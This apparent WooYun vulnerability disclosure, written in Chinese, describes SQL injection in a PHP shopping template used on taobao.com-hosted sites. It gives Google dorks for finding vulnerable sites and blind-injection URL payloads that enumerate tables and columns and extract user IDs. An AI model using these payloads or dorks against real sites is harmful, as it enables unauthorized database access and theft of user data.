WooYun.org

GOOGLE 关键字：
site:taobao.com inurl:/c/list_goods.php?category_id=
site:taobao.com inurl:/theme/tejia/view/view_article.php?id=
site:taobao.com inurl:/theme/daogou/view/list_goods.php?category_id
都是存在注入点的
使用这套代码的使用量是很大的

过程：
根据上次发现的注入点，认为如果存在注入不应该只有一个注入点才对 ，于是有了。。
http://%domain%/theme/tejia/view/view_article.php?id=(SELECT+(CASE+WHEN+(3373=3373)+THEN+(21+and+1=1)+ELSE+1/(SELECT+0)+END)) 访问此连接返回的是200 即页面正常显示 （21+and+1=1）

http://%domain%/theme/tejia/view/view_article.php?id=(SELECT+(CASE+WHEN+(3373=3373)+THEN+(21+and+1=2)+ELSE+1/(SELECT+0)+END)) 访问此连接返回的是
302 即页面跳转到错误页面 （21+and+1=2）

至此确定存在了SQL 注入 ，接下来就是看能不能注入出数据了 ，测试过程众发现似乎有过滤了一些东西，不能使用database()、user() 之类的。 于是想到了使用盲注来猜解。
http://%domain%/theme/tejia/view/view_article.php?id=(SELECT+(CASE+WHEN+(3373=3373)+THEN+(21+and+exists(select+*+from+$$))+ELSE+1/(SELECT+0)+END))
$$ 位置使用burp 加载table来跑 可以得到一些数据表名 user 、item 、 items 、category

而列名，使用同样的方法
http://%domain%/theme/tejia/view/view_article.php?id=(SELECT+(CASE+WHEN+(3373=3373)+THEN+(21+and+exists(select+$$+from+user))+ELSE+1/(SELECT+0)+END))
可以得到user表的列名 id name description title category_id uid keyword address zip nick phone name 等列名

却定来表名和列名，接下来就是数据来
通过 http://%domain%/theme/tejia/view/view_article.php?id=(SELECT+(CASE+WHEN+(3373=3373)+THEN+(21+and+ascii(substring(select+uid+from+user+limit+1,1),1,1)=48)+ELSE+1/(SELECT+0)+END)) 来判断第一个用户的uid的第一个数字

以此我们可以完整的 得出uid

其他列名数据类似方法。